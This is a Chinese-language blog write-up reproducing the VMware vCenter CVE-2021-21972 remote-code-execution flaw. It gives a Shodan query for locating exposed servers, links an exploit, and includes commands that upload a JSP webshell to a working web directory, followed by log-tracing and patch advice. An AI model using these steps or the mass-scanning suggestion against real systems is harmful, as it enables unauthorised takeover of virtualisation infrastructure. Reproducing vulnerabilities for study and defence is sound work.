CVE-2021-21972 VMware vCenter RCE 远程代码执行漏洞复现

漏洞简述

VMware是一家云基础架构和移动商务解决方案厂商，提供基于VMware的虚拟化解决方案。vSphere 是 VMware 推出的虚拟化平台套件，包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心，可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。

在 CVE-2021-21972 VMware vCenter Server 远程代码漏洞 中，攻击者可直接通过443端口构造恶意请求，从而在服务器上写入 webshell，最终造成远程任意代码执行。

漏洞影响版本

• VMware vCenter Server 7.0系列 < 7.0.U1c
• VMware vCenter Server 6.7系列 < 6.7.U3l
• VMware vCenter Server 6.5系列 < 6.5 U3n

Shodan 搜索语法

http.title:"+ ID_VC_Welcome +"

漏洞exp

https://github.com/horizon3ai/CVE-2021-21972

漏洞环境搭建

腾讯云 Microsoft Windows Server 2016 Datacenter

下载安装 VMware-VIM-all-6.7.0-13643870.iso
链接: https://pan.baidu.com/s/1gV8r_vwVIzd_RZ939wqEuA?pwd=hdor 提取码: hdor

具体安装过程可参考网上搭建文章，安装完成后浏览器打开本机ip。

漏洞复现

使用上面提供的exp。

python CVE-2021-21972.py -t 10.0.12.12

也可以用该脚本配合shodan进行批量检测。

# 这样无法上传成功
python CVE-2021-21972.py -t 10.0.12.12 -o win -f cmdjsp.jsp -p cmd.jsp

默认网站根目录路径为：C:\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps

文件上传是可以成功的，但根目录无法访问。

需要上传到 C:\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport 目录下。

python CVE-2021-21972.py -t 10.0.12.12 -o win -f cmdjsp.jsp -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\cmd.jsp

命令执行成功。

入侵溯源

https://kb.vmware.com/s/article/2110014?lang=zh_CN

VMware vCenter Server 6.0 日志位于 %ALLUSERSPROFILE%\VMWare\vCenterServer\logs 文件夹中。VMware vCenter Server Appliance 6.0 日志位于 /var/log/vmware/ 文件夹中

vmware vcenter 日志路径：C:\ProgramData\VMware\vCenterServer\logs

同时排查网站目录下是否存在webshell，以及文件写入时间。

修复方式

• vCenter Server7.0版本升级到7.0.U1c
• vCenter Server6.7版本升级到6.7.U3l
• vCenter Server6.5版本升级到6.5 U3n

赞赏

微信赞赏支付宝赞赏